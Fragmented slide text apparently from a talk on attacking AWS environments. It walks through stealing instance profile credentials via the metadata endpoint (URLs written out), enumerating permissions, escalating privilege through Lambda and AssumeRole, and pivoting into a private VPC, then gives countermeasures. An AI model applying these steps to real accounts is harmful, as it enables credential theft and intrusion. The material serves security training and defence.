credentials to consume the AWS API. Developers can provide these in multiple ways: • Hard-coded into the application • Environment variables • Provided via an instance profile
a virtual HTTP server to each compute instance This server stores information about the instance such as host name, IP address, and instance profile credentials
of IAM permissions that grant access AWS services such as S3, DynamoDB or EC2. Least privilege principle should be used when configuring these permissions, but...
paths are used to gain access to the instance profile credentials: The first one returns the role name, which is required to perform the second HTTP request. The second HTTP response yields a JSON document containing the credentials. http://169.254.169.254/ /latest/meta-data/iam/security-credentials/ /latest/meta-data/iam/security-credentials/{role-name}
ways to enumerate permissions for a given credential set: • Use the IAM service to get the role permissions. In most cases this will fail because the role itself has no permission for the IAM API. • Call each AWS API and analyze the response: Brute-force
], "Resource":"*" } ] } After permission enumeration the attacker knows that he's able to run all read-only API actions for S3 and Lambda. The most common scenario is that all API calls for S3 and Lambda are allowed. Even after permission enumeration there are many things the attacker doesn't know.
to a principal with full access to the AWS account There are 28 well known privilege escalation techniques. Most of them are implemented in Pacu. { "Statement":[ { "Effect":"Allow", "Action":[ "*", ], "Resource": "*" } ] }
method: • Identify an existing IAM role with high privileges • Create a new Lambda and associate the role • Run the lambda function The Lambda function will have access to the IAM role, just like EC2 instances have access to EC2 instance profile credentials.
detected when a new lambda function is created and removed. Another alternative is to change the source code for an existing lambda function to include our exploit.
allowed to iam:AssumeRole. In the compromised AWS account there is an existing trust policy in the AdminRole which allows all principals in the SSO AWS account to assume role.
to gain access to most resources in the AWS account. The accounts payable EC2 instance remains out of reach. The VPC is completely isolated from the Internet.
VPN connection using vpc-vpn-pivot depend on the technique being exploited. When no permissions are limiting the attack the default technique with AWS Client VPN is used
be eventually compromised by an evil third-party. SSRF is the most common attack vector but others such as credentials hard-coded in applications, misconfigured AWS Cognito instances, phishing and developer workstation compromise also exist. The following countermeasures focus on reducing blast radius and threat detection.
IAM principals. Restricted permissions on the web server role WebApplicationRole will prevent S3 bucket access and privilege escalation Restricted permissions on MonitoringRole would have reduced the impact of the privilege escalation.
any breach by using different AWS accounts to host your company workloads. The accounts payable application should have been deployed in a different AWS account within the same AWS Organization.
remember: • It is possible to enumerate AWS credential permissions in a fast, safe and in-depth manner using enumerate-iam • Cloud exploitation can be automated using pacu • Private VPC networks can be breached using vpc-vpn-pivot Follow @AndresRiancho on twitter for more interesting cloud security content
• Cloud Security Assessment • Intro to AWS Hacking training • Application Penetration Test • Source Code Review Let me know, I can help you deliver secure web applications.